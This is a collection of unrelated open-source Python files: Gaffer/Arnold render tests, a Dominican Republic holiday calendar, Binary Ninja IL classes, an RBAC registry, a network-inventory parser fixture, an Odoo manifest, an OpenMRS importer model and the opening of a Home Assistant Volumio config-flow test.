render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Don't really understand why a regular `with CapturingMessageHandler` doesn't work here
try :
defaultHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler( mh )
render["task"].execute()
finally :
IECore.MessageHandler.setDefaultHandler( defaultHandler )
# We want to see one message per invalid light - not repeated for each location it's referenced at
self.assertEqual( len( mh.messages ), 2 )
mm = [ m.message for m in mh.messages ]
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group" in mm )
self.assertTrue( "Mesh light without object at location: /group/lightGroup/group1" in mm )
def __color4fAtUV( self, image, uv ) :
sampler = GafferImage.ImageSampler()
sampler["image"].setInput( image["out"] )
dw = image['out']["format"].getValue().getDisplayWindow().size()
sampler["pixel"].setValue( uv * imath.V2f( dw.x, dw.y ) )
return sampler["color"].getValue()
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
def testPerformanceMonitorDoesntCrash( self ) :
options = GafferScene.StandardOptions()
options["options"]["performanceMonitor"]["value"].setValue( True )
options["options"]["performanceMonitor"]["enabled"].setValue( True )
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testShaderSubstitutions( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["planeAttrs"] = GafferScene.CustomAttributes()
s["planeAttrs"]["in"].setInput( s["plane"]["out"] )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'bar' ) ) )
s["planeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'foo' ) ) )
s["cube"] = GafferScene.Cube()
s["cubeAttrs"] = GafferScene.CustomAttributes()
s["cubeAttrs"]["in"].setInput( s["cube"]["out"] )
s["cubeAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'override' ) ) )
s["parent"] = GafferScene.Parent()
s["parent"]["in"].setInput( s["planeAttrs"]["out"] )
s["parent"]["children"][0].setInput( s["cubeAttrs"]["out"] )
s["parent"]["parent"].setValue( "/plane" )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
s["shader"]["parameters"]["filename"].setValue( "<attr:A>/path/<attr:B>.tx" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["parent"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "photometric_light" )
s["light"]["parameters"]["filename"].setValue( "/path/<attr:A>.ies" )
s["goboTexture"] = GafferArnold.ArnoldShader()
s["goboTexture"].loadShader( "image" )
s["goboTexture"]["parameters"]["filename"].setValue( "<attr:B>/gobo.tx" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["gobo"]["parameters"]["slidemap"].setInput( s["goboTexture"]["out"] )
s["goboAssign"] = GafferScene.ShaderAssignment()
s["goboAssign"]["in"].setInput( s["light"]["out"] )
s["goboAssign"]["shader"].setInput( s["gobo"]["out"] )
s["lightBlocker"] = GafferArnold.ArnoldLightFilter()
s["lightBlocker"].loadShader( "light_blocker" )
s["lightBlocker"]["parameters"]["geometry_type"].setValue( "<attr:geometryType>" )
s["lightGroup"] = GafferScene.Group()
s["lightGroup"]["name"].setValue( "lightGroup" )
s["lightGroup"]["in"][0].setInput( s["goboAssign"]["out"] )
s["lightGroup"]["in"][1].setInput( s["lightBlocker"]["out"] )
s["parent2"] = GafferScene.Parent()
s["parent2"]["in"].setInput( s["shaderAssignment"]["out"] )
s["parent2"]["children"][0].setInput( s["lightGroup"]["out"] )
s["parent2"]["parent"].setValue( "/" )
s["globalAttrs"] = GafferScene.CustomAttributes()
s["globalAttrs"]["in"].setInput( s["parent2"]["out"] )
s["globalAttrs"]["global"].setValue( True )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "A", Gaffer.StringPlug( "value", defaultValue = 'default1' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "B", Gaffer.StringPlug( "value", defaultValue = 'default2' ) ) )
s["globalAttrs"]["attributes"].addChild( Gaffer.NameValuePlug( "geometryType", Gaffer.StringPlug( "value", defaultValue = 'cylinder' ) ) )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["globalAttrs"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
plane = arnold.AiNodeLookUpByName( universe, "/plane" )
shader = arnold.AiNodeGetPtr( plane, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader, "filename" ), "bar/path/foo.tx" )
cube = arnold.AiNodeLookUpByName( universe, "/plane/cube" )
shader2 = arnold.AiNodeGetPtr( cube, "shader" )
self.assertEqual( arnold.AiNodeGetStr( shader2, "filename" ), "bar/path/override.tx" )
light = arnold.AiNodeLookUpByName( universe, "light:/lightGroup/light" )
self.assertEqual( arnold.AiNodeGetStr( light, "filename" ), "/path/default1.ies" )
gobo = arnold.AiNodeGetPtr( light, "filters" )
goboTex = arnold.AiNodeGetLink( gobo, "slidemap" )
self.assertEqual( arnold.AiNodeGetStr( goboTex, "filename" ), "default2/gobo.tx" )
lightFilter = arnold.AiNodeLookUpByName( universe, "lightFilter:/lightGroup/lightFilter" )
self.assertEqual( arnold.AiNodeGetStr( lightFilter, "geometry_type" ), "cylinder" )
def testEncapsulateDeformationBlur( self ) :
s = Gaffer.ScriptNode()
# Make a sphere where the red channel has the value of the current frame.
s["sphere"] = GafferScene.Sphere()
s["sphereFilter"] = GafferScene.PathFilter()
s["sphereFilter"]["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
s["frame"] = GafferTest.FrameNode()
s["flat"] = GafferArnold.ArnoldShader()
s["flat"].loadShader( "flat" )
s["flat"]["parameters"]["color"].setValue( imath.Color3f( 0 ) )
s["flat"]["parameters"]["color"]["r"].setInput( s["frame"]["output"] )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["sphere"]["out"] )
s["assignment"]["shader"].setInput( s["flat"]["out"] )
s["assignment"]["filter"].setInput( s["sphereFilter"]["out"] )
# Put the sphere in a capsule.
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["assignment"]["out"] )
s["groupFilter"] = GafferScene.PathFilter()
s["groupFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
s["encapsulate"] = GafferScene.Encapsulate()
s["encapsulate"]["in"].setInput( s["group"]["out"] )
s["encapsulate"]["filter"].setInput( s["groupFilter"]["out"] )
# Do a render at frame 1, with deformation blur off.
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ),
"exr",
"rgba",
{
}
)
)
s["outputs"]["in"].setInput( s["encapsulate"]["out"] )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["outputs"]["out"] )
s["arnoldOptions"] = GafferArnold.ArnoldOptions()
s["arnoldOptions"]["in"].setInput( s["options"]["out"] )
s["arnoldOptions"]["options"]["aaSamples"]["enabled"].setValue( True )
s["arnoldOptions"]["options"]["aaSamples"]["value"].setValue( 6 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["arnoldOptions"]["out"] )
s["render"]["task"].execute()
# Do another render at frame 1, but with deformation blur on.
s["options"]["options"]["deformationBlur"]["enabled"].setValue( True )
s["options"]["options"]["deformationBlur"]["value"].setValue( True )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["shutter"]["value"].setValue( imath.V2f( -0.5, 0.5 ) )
s["outputs"]["outputs"][0]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
s["render"]["task"].execute()
# Check that the renders are the same.
s["deformationOff"] = GafferImage.ImageReader()
s["deformationOff"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOff.exr" ) )
s["deformationOn"] = GafferImage.ImageReader()
s["deformationOn"]["fileName"].setValue( os.path.join( self.temporaryDirectory(), "deformationBlurOn.exr" ) )
# The `maxDifference` is huge to account for noise and watermarks, but is still low enough to check what
# we want, since if the Encapsulate was sampled at shutter open and not the frame, the difference would be
# 0.5.
self.assertImagesEqual( s["deformationOff"]["out"], s["deformationOn"]["out"], maxDifference = 0.27, ignoreMetadata = True )
def testCoordinateSystem( self ) :
coordinateSystem = GafferScene.CoordinateSystem()
render = GafferArnold.ArnoldRender()
render["in"].setInput( coordinateSystem["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( os.path.join( self.temporaryDirectory(), "test.ass" ) )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, render["fileName"].getValue() )
# Arnold doesn't support coordinate systems, so we don't expect a
# node to have been created for ours.
self.assertIsNone( arnold.AiNodeLookUpByName( universe, "/coordinateSystem" ) )
if __name__ == "__main__":
unittest.main()
|
holidays/countries/dominican_republic.py
|
m-ganko/python-holidays
| 654 |
129020
|
# -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <<EMAIL>> (c) 2014-2017
# dr-prodigy <<EMAIL>> (c) 2017-2021
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, MO, FR
from holidays.constants import JAN, FEB, MAY, JUN, AUG, SEP, NOV, DEC
from holidays.holiday_base import HolidayBase
class DominicanRepublic(HolidayBase):
# http://ojd.org.do/Normativas/LABORAL/Leyes/Ley%20No.%20%20139-97.pdf
# https://es.wikipedia.org/wiki/Rep%C3%BAblica_Dominicana#D%C3%ADas_festivos_nacionales
def __init__(self, **kwargs):
self.country = "DO"
HolidayBase.__init__(self, **kwargs)
@staticmethod
def __change_day_by_law(holiday, latest_days=(3, 4)):
# Law No. 139-97 - Holidays Dominican Republic - Jun 27, 1997
if holiday >= date(1997, 6, 27):
if holiday.weekday() in [1, 2]:
holiday -= rd(weekday=MO(-1))
elif holiday.weekday() in latest_days:
holiday += rd(weekday=MO(1))
return holiday
def _populate(self, year):
# New Year's Day
self[date(year, JAN, 1)] = "Año Nuevo [New Year's Day]"
# Epiphany
epiphany_day = self.__change_day_by_law(date(year, JAN, 6))
self[epiphany_day] = "Día de los Santos Reyes [Epiphany]"
# Lady of Altagracia
self[date(year, JAN, 21)] = "Día de la Altagracia [Lady of Altagracia]"
# Juan Pablo Duarte Day
duarte_day = self.__change_day_by_law(date(year, JAN, 26))
self[duarte_day] = "Día de Duarte [Juan Pablo Duarte Day]"
# Independence Day
self[date(year, FEB, 27)] = "Día de Independencia [Independence Day]"
# Good Friday
self[easter(year) + rd(weekday=FR(-1))] = "Viernes Santo [Good Friday]"
# Labor Day
labor_day = self.__change_day_by_law(date(year, MAY, 1), (3, 4, 6))
self[labor_day] = "Día del Trabajo [Labor Day]"
# Feast of Corpus Christi
self[date(year, JUN, 11)] = "Corpus Christi [Feast of Corpus Christi]"
# Restoration Day
# Judgment No. 14 of Feb 20, 2008 of the Supreme Court of Justice
restoration_day = (
date(year, AUG, 16)
if ((year - 2000) % 4 == 0) and year < 2008
else self.__change_day_by_law(date(year, AUG, 16))
)
self[restoration_day] = "Día de la Restauración [Restoration Day]"
# Our Lady of Mercedes Day
self[date(year, SEP, 24)] = "Día de las Mercedes [Our Lady of Mercedes Day]"
# Constitution Day
constitution_day = self.__change_day_by_law(date(year, NOV, 6))
self[constitution_day] = "Día de la Constitución [Constitution Day]"
# Christmas Day
self[date(year, DEC, 25)] = "Día de Navidad [Christmas Day]"
class DO(DominicanRepublic):
pass
class DOM(DominicanRepublic):
pass
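# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of querying the class above, assuming the `holidays`
# package is installed; the dates are chosen purely for illustration.
# Jan 6, 2021 (Epiphany) falls on a Wednesday, so Law No. 139-97 moves the
# observed holiday back to Monday, Jan 4.
if __name__ == "__main__":
    do_holidays = DominicanRepublic(years=2021)
    print(date(2021, 1, 4) in do_holidays)    # True (observed Epiphany)
    print(date(2021, 12, 25) in do_holidays)  # True (Christmas Day)
    for day, name in sorted(do_holidays.items()):
        print(day, name)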
|
python/commonil.py
|
cblichmann/binaryninja-api
| 589 |
129027
|
# Copyright (c) 2019-2021 Vector 35 Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from dataclasses import dataclass
from .flowgraph import FlowGraph, FlowGraphNode
from .enums import BranchType
from .interaction import show_graph_report
from .log import log_warn
# This file contains a list of top level abstract classes for implementing BNIL instructions
@dataclass(frozen=True, repr=False)
class BaseILInstruction:
@classmethod
def prepend_parent(cls, graph:FlowGraph, node:FlowGraphNode, nodes={}):
for parent in cls.__bases__:
if not issubclass(parent, BaseILInstruction):
continue
if parent.__name__ in nodes:
nodes[parent.__name__].add_outgoing_edge(BranchType.UnconditionalBranch, node)
else:
parent_node = FlowGraphNode(graph)
parent_node.lines = [f"{parent.__name__}"]
parent_node.add_outgoing_edge(BranchType.UnconditionalBranch, node)
graph.append(parent_node)
nodes[parent.__name__] = parent_node
parent.prepend_parent(graph, parent_node, nodes)
@classmethod
def add_subgraph(cls, graph, nodes):
node = FlowGraphNode(graph)
node.lines = [f"{cls.__name__}"]
graph.append(node)
cls.prepend_parent(graph, node, nodes)
return graph
@classmethod
def show_hierarchy_graph(cls):
show_graph_report(f"{cls.__name__}", cls.add_subgraph(FlowGraph(), {}))
@dataclass(frozen=True, repr=False)
class Constant(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class BinaryOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class UnaryOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Comparison(BinaryOperation):
pass
@dataclass(frozen=True, repr=False)
class SSA(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Phi(SSA):
pass
@dataclass(frozen=True, repr=False)
class FloatingPoint(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class ControlFlow(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Terminal(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Loop(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Call(ControlFlow):
pass
@dataclass(frozen=True, repr=False)
class Syscall(Call):
pass
@dataclass(frozen=True, repr=False)
class Tailcall(Call):
pass
@dataclass(frozen=True, repr=False)
class Return(Terminal):
pass
@dataclass(frozen=True, repr=False)
class Signed(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Arithmetic(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Carry(Arithmetic):
pass
@dataclass(frozen=True, repr=False)
class DoublePrecision(Arithmetic):
pass
@dataclass(frozen=True, repr=False)
class Memory(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Load(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class Store(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class RegisterStack(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class SetVar(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class StackOperation(BaseILInstruction):
pass
@dataclass(frozen=True, repr=False)
class SetReg:
pass
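# --- Illustrative sketch (not part of the original module) ---
# Concrete BNIL instruction dataclasses combine these mixins via multiple
# inheritance. `ExampleAddWithCarry` below is a hypothetical class used only
# to show how the hierarchy composes; it is not a real BNIL operation.
@dataclass(frozen=True, repr=False)
class ExampleAddWithCarry(Carry, Signed):
    """Hypothetical instruction mixing arithmetic-with-carry and signed traits."""

# Both mixin chains lead back to BaseILInstruction:
assert issubclass(ExampleAddWithCarry, Arithmetic)
assert issubclass(ExampleAddWithCarry, BaseILInstruction)
# Inside the Binary Ninja UI, the inheritance chain could be rendered with:
# ExampleAddWithCarry.show_hierarchy_graph()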
|
rbac/acl.py
|
eldorplus/simple-rbac
| 219 |
129030
|
from __future__ import absolute_import
import itertools
__all__ = ["Registry"]
class Registry(object):
"""The registry of access control list."""
def __init__(self):
self._roles = {}
self._resources = {}
self._allowed = {}
self._denied = {}
# to allow additional short circuiting, track roles that only
# ever deny access
self._denial_only_roles = set()
self._children = {}
def add_role(self, role, parents=[]):
"""Add a role or append parents roles to a special role.
All added roles should be hashable.
(http://docs.python.org/glossary.html#term-hashable)
"""
self._roles.setdefault(role, set())
self._roles[role].update(parents)
for p in parents:
self._children.setdefault(p, set())
self._children[p].add(role)
# all roles start as deny-only (unless one of its parents
# isn't deny-only)
if not parents or self._roles_are_deny_only(parents):
self._denial_only_roles.add(role)
def add_resource(self, resource, parents=[]):
"""Add a resource or append parents resources to a special resource.
All added resources should be hashable.
(http://docs.python.org/glossary.html#term-hashable)
"""
self._resources.setdefault(resource, set())
self._resources[resource].update(parents)
def allow(self, role, operation, resource, assertion=None):
"""Add a allowed rule.
The added rule will allow the role and its all children roles to
operate the resource.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
self._allowed[role, operation, resource] = assertion
# since we just allowed a permission, role and any children aren't
# denied-only
for r in itertools.chain([role], get_family(self._children, role)):
self._denial_only_roles.discard(r)
def deny(self, role, operation, resource, assertion=None):
"""Add a denied rule.
The added rule will deny the role and its all children roles to
operate the resource.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
self._denied[role, operation, resource] = assertion
def is_allowed(self, role, operation, resource, check_allowed=True,
**assertion_kwargs):
"""Check the permission.
If the access is denied, this method will return False; if the access
is allowed, this method will return True; if no rule matches the
access, this method will return None.
"""
assert not role or role in self._roles
assert not resource or resource in self._resources
roles = set(get_family(self._roles, role))
operations = {None, operation}
resources = set(get_family(self._resources, resource))
def DefaultAssertion(*args, **kwargs):
return True
is_allowed = None
default_assertion = DefaultAssertion
for permission in itertools.product(roles, operations, resources):
if permission in self._denied:
assertion = self._denied[permission] or default_assertion
if assertion(self, role, operation, resource,
**assertion_kwargs):
return False # denied by rule immediately
if check_allowed and permission in self._allowed:
assertion = self._allowed[permission] or default_assertion
if assertion(self, role, operation, resource,
**assertion_kwargs):
is_allowed = True # allowed by rule
return is_allowed
def is_any_allowed(self, roles, operation, resource, **assertion_kwargs):
"""Check the permission with many roles."""
is_allowed = None # no matching rules
for i, role in enumerate(roles):
# if access not yet allowed and all remaining roles could
# only deny access, short-circuit and return False
if not is_allowed and self._roles_are_deny_only(roles[i:]):
return False
check_allowed = not is_allowed
# if another role gave access,
# don't bother checking if this one is allowed
is_current_allowed = self.is_allowed(role, operation, resource,
check_allowed=check_allowed,
**assertion_kwargs)
if is_current_allowed is False:
return False # denied by rule
elif is_current_allowed is True:
is_allowed = True
return is_allowed
def _roles_are_deny_only(self, roles):
return all(r in self._denial_only_roles for r in roles)
def get_family(all_parents, current):
"""Iterate current object and its all parents recursively."""
yield current
for parent in get_parents(all_parents, current):
yield parent
yield None
def get_parents(all_parents, current):
"""Iterate current object's all parents."""
for parent in all_parents.get(current, []):
yield parent
for grandparent in get_parents(all_parents, parent):
yield grandparent
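# --- Illustrative usage sketch (not part of the original module) ---
# Role, operation and resource names below are arbitrary strings chosen for
# illustration; any hashable objects work. The expected results follow from
# the rules defined above.
if __name__ == "__main__":
    acl = Registry()
    acl.add_role("staff")
    acl.add_role("editor", parents=["staff"])
    acl.add_resource("article")

    acl.allow("staff", "view", "article")
    acl.allow("editor", "edit", "article")
    acl.deny("staff", "delete", "article")

    print(acl.is_allowed("editor", "view", "article"))     # True: inherited from "staff"
    print(acl.is_allowed("staff", "edit", "article"))       # None: no matching rule
    print(acl.is_allowed("editor", "delete", "article"))    # False: denial inherited
    print(acl.is_any_allowed(["staff", "editor"], "edit", "article"))  # True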
|
src/genie/libs/parser/ios/asr901/tests/ShowInventory/cli/equal/golden_output_expected.py
|
balmasea/genieparser
| 204 |
129076
|
<gh_stars>100-1000
expected_output = {
"main": {
"chassis": {
"name": {
"descr": "A901-6CZ-FT-A Chassis",
"name": "A901-6CZ-FT-A Chassis",
"pid": "A901-6CZ-FT-A",
"sn": "CAT2342U1S6",
"vid": "V04 "
}
}
},
"slot": {
"0": {
"rp": {
"A901-6CZ-FT-A Chassis": {
"descr": "A901-6CZ-FT-A Chassis",
"name": "A901-6CZ-FT-A Chassis",
"pid": "A901-6CZ-FT-A",
"sn": "CAT2342U1S6",
"subslot": {
"0/11": {
"GigabitEthernet 0/11": {
"descr": "1000BASE-T SFP",
"name": "GigabitEthernet 0/11",
"pid": "GLC-T",
"sn": "AGM183321AW",
"vid": "B2 "
}
}
},
"vid": "V04 "
}
}
},
"AC/DC Power supply": {
"other": {
"AC/DC Power supply": {
"descr": "AC/DC Power Supply 1 (12V)",
"name": "AC/DC Power supply",
"pid": "POWER SUPPLY",
"sn": "34-2593-01",
"vid": ""
}
}
},
"Board Temperature Sensor": {
"other": {
"Board Temperature Sensor": {
"descr": "Board Temperature Sensor",
"name": "Board Temperature Sensor",
"pid": "Temperature Sensor",
"sn": "15-9325-01",
"vid": ""
}
}
},
"Fan1": {
"other": {
"Fan1": {
"descr": "High Speed Fan1 Module for A901-6CZ-FT-A",
"name": "Fan1",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"Fan2": {
"other": {
"Fan2": {
"descr": "High Speed Fan2 Module for A901-6CZ-FT-A",
"name": "Fan2",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"Fan3": {
"other": {
"Fan3": {
"descr": "High Speed Fan3 Module for A901-6CZ-FT-A",
"name": "Fan3",
"pid": "FAN",
"sn": "33-0629-01",
"vid": ""
}
}
},
"GigabitEthernet 0/10": {
"other": {
"GigabitEthernet 0/10": {
"descr": "1000BASE-T SFP",
"name": "GigabitEthernet 0/10",
"pid": "SBCU-5740ARZ-CS1",
"sn": "AVC211321TE",
"vid": "G3."
}
}
},
"Inlet Temperature Sensor": {
"other": {
"Inlet Temperature Sensor": {
"descr": "Inlet Temperature Sensor",
"name": "Inlet Temperature Sensor",
"pid": "Temperature Sensor",
"sn": "15-9325-01",
"vid": ""
}
}
}
}
}
|
ch03/library_app/__manifest__.py
|
dreispt/Odoo-12-Development-Essentials-Fourth-Edition
| 121 |
129092
|
<gh_stars>100-1000
{'name': 'Library Management Application',
'description': 'Library books, members and book borrowing.',
'author': '<NAME>',
'depends': ['base'],
'data': [
'security/library_security.xml',
'security/ir.model.access.csv',
'views/library_menu.xml',
'views/book_view.xml',
'views/book_list_template.xml',
],
'application': True,
'installable': True,
}
|
corehq/motech/openmrs/models.py
|
akashkj/commcare-hq
| 471 |
129143
|
<gh_stars>100-1000
import re
from datetime import datetime
from functools import partial
from memoized import memoized
from dimagi.ext.couchdbkit import (
DictProperty,
Document,
DocumentSchema,
IntegerProperty,
ListProperty,
StringProperty,
)
from corehq.motech.const import (
COMMCARE_DATA_TYPE_DATE,
COMMCARE_DATA_TYPE_DATETIME,
COMMCARE_DATA_TYPES,
DATA_TYPE_UNKNOWN,
IMPORT_FREQUENCY_CHOICES,
IMPORT_FREQUENCY_DAILY,
IMPORT_FREQUENCY_MONTHLY,
IMPORT_FREQUENCY_WEEKLY,
)
from corehq.motech.openmrs.const import (
OPENMRS_DATA_TYPE_MILLISECONDS,
OPENMRS_DATA_TYPES,
)
from corehq.motech.openmrs.serializers import (
omrs_timestamp_to_date,
omrs_timestamp_to_datetime,
serializers,
)
from corehq.util.timezones.utils import (
coerce_timezone_value,
get_timezone_for_domain,
)
class ColumnMapping(DocumentSchema):
column = StringProperty()
property = StringProperty()
data_type = StringProperty(choices=OPENMRS_DATA_TYPES, required=False)
commcare_data_type = StringProperty(
required=False, choices=COMMCARE_DATA_TYPES + (DATA_TYPE_UNKNOWN,),
default=DATA_TYPE_UNKNOWN, exclude_if_none=True
)
def deserialize(mapping, external_value, timezone=None):
"""
Returns ``external_value`` as its CommCare data type.
"""
# Update serializers with timezone
to_datetime_tz = partial(omrs_timestamp_to_datetime, tz=timezone)
to_date_tz = partial(omrs_timestamp_to_date, tz=timezone)
local_serializers = serializers.copy()
local_serializers.update({
(OPENMRS_DATA_TYPE_MILLISECONDS, None): to_datetime_tz,
(OPENMRS_DATA_TYPE_MILLISECONDS, COMMCARE_DATA_TYPE_DATETIME): to_datetime_tz,
(OPENMRS_DATA_TYPE_MILLISECONDS, COMMCARE_DATA_TYPE_DATE): to_date_tz,
})
serializer = (
local_serializers.get((mapping.data_type, mapping.commcare_data_type))
or local_serializers.get((None, mapping.commcare_data_type))
)
return serializer(external_value) if serializer else external_value
class OpenmrsImporter(Document):
"""
Import cases from an OpenMRS instance using a report
"""
domain = StringProperty()
# TODO: (2020-03-06) Migrate to ConnectionSettings
server_url = StringProperty() # e.g. "http://www.example.com/openmrs"
username = StringProperty()
password = StringProperty()
notify_addresses_str = StringProperty(default="") # See also notify_addresses()
# If a domain has multiple OpenmrsImporter instances, for which CommCare location is this one authoritative?
location_id = StringProperty()
# How often should cases be imported
import_frequency = StringProperty(choices=IMPORT_FREQUENCY_CHOICES, default=IMPORT_FREQUENCY_MONTHLY)
log_level = IntegerProperty()
# Timezone name. If not specified, the domain's timezone will be used.
timezone = StringProperty()
# OpenMRS UUID of the report of patients to be imported
report_uuid = StringProperty()
# Can include template params, e.g. {"endDate": "{{ today }}"}
# Available template params: "today", "location"
report_params = DictProperty()
# The case type of imported cases
case_type = StringProperty()
# The ID of the owner of imported cases, if all imported cases are to have the same owner. To assign imported
# cases to different owners, see `location_type` below.
owner_id = StringProperty()
# If report_params includes "{{ location }}" then location_type_name is used to determine which locations to
# pull the report for. Those locations will need an "openmrs_uuid" param set. Imported cases will be owned by
# the first mobile worker assigned to that location. If this OpenmrsImporter.location_id is set, only
# sub-locations will be returned
location_type_name = StringProperty()
# external_id should always be the OpenMRS UUID of the patient (and not, for example, a national ID number)
# because it is immutable. external_id_column is the column that contains the UUID
external_id_column = StringProperty()
# Space-separated column(s) to be concatenated to create the case name (e.g. "givenName familyName")
name_columns = StringProperty()
column_map = ListProperty(ColumnMapping)
def __str__(self):
url = "@".join((self.username, self.server_url)) if self.username else self.server_url
return f"<{self.__class__.__name__} {self._id} {url}>"
@property
def notify_addresses(self):
return [addr for addr in re.split('[, ]+', self.notify_addresses_str) if addr]
@memoized
def get_timezone(self):
if self.timezone:
return coerce_timezone_value(self.timezone)
else:
return get_timezone_for_domain(self.domain)
def should_import_today(self):
today = datetime.today()
return (
self.import_frequency == IMPORT_FREQUENCY_DAILY
or (
self.import_frequency == IMPORT_FREQUENCY_WEEKLY
and today.weekday() == 1 # Tuesday
)
or (
self.import_frequency == IMPORT_FREQUENCY_MONTHLY
and today.day == 1
)
)
|
tests/components/volumio/test_config_flow.py
|
MrDelik/core
| 30,023 |
129152
|
<reponame>MrDelik/core
"""Test the Volumio config flow."""
from unittest.mock import patch
from homeassistant import config_entries
from homeassistant.components import zeroconf
from homeassistant.components.volumio.config_flow import CannotConnectError
from homeassistant.components.volumio.const import DOMAIN
from tests.common import MockConfigEntry
TEST_SYSTEM_INFO = {"id": "1111-1111-1111-1111", "name": "TestVolumio"}
TEST_CONNECTION = {
"host": "1.1.1.1",
"port": 3000,
}
TEST_DISCOVERY = zeroconf.ZeroconfServiceInfo(
host="1.1.1.1",
addresses=["1.1.1.1"],
hostname="mock_hostname",
name="mock_name",
port=3000,
properties={"volumioName": "discovered", "UUID": "2222-2222-2222-2222"},
type="mock_type",
)
TEST_DISCOVERY_RESULT = {
"host": TEST_DISCOVERY.host,
"port": TEST_DISCOVERY.port,
"id": TEST_DISCOVERY.properties["UUID"],
"name": TEST_DISCOVERY.properties["volumioName"],
}
async def test_form(hass):
"""Test we get the form."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
